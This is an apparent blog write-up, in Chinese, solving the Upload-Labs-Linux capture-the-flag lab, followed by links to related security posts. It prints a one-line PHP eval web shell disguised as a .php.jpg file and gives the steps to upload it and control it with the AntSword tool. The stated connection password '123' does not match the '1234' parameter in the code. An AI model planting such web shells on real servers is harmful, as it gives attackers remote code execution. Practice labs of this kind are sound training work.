Upload-Labs-Linux

题目

1.打开靶机

随便上传一个图片,查看get请求发现**/upload/XXX.jpg**

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST[1234])?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找'/'在最下面找到flag文件

5,打开文件得到flag

相关推荐
_只道当时是寻常25 分钟前
【网络入侵检测】基于源码分析Suricata的IP分片重组
网络·安全·网络安全·安全威胁分析
Johny_Zhao17 小时前
思科安全大模型SOC作业应用分析
linux·网络·人工智能·网络安全·ai·信息安全·云计算·shell·devops·cisco·yum源·系统运维·itsm
Le_ee20 小时前
sqli-labs靶场第二关——数字型
数据库·sql·网络安全·sql注入·sqli—labs
网络空间小黑1 天前
护网HVV初级蓝队面试题总结
安全·web安全·网络安全·系统安全·安全架构
大慕慕好懒1 天前
redis未授权访问
redis·网络安全·渗透·ssrf
网安INF1 天前
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
java·网络安全·apache
一口一个橘子1 天前
[ctfshow web入门] web71
前端·web安全·网络安全
网络空间小黑1 天前
渗透测试行业术语2
服务器·网络·安全·网络安全·中间件
A5rZ2 天前
js原型污染 + xss劫持base -- no-code b01lersctf 2025
网络安全
Johny_Zhao2 天前
堆叠、MLAG、VPC、VSS 技术对比及架构建议
linux·网络·人工智能·python·网络安全·ai·信息安全·云计算·cisco·等保测评·huawei·系统运维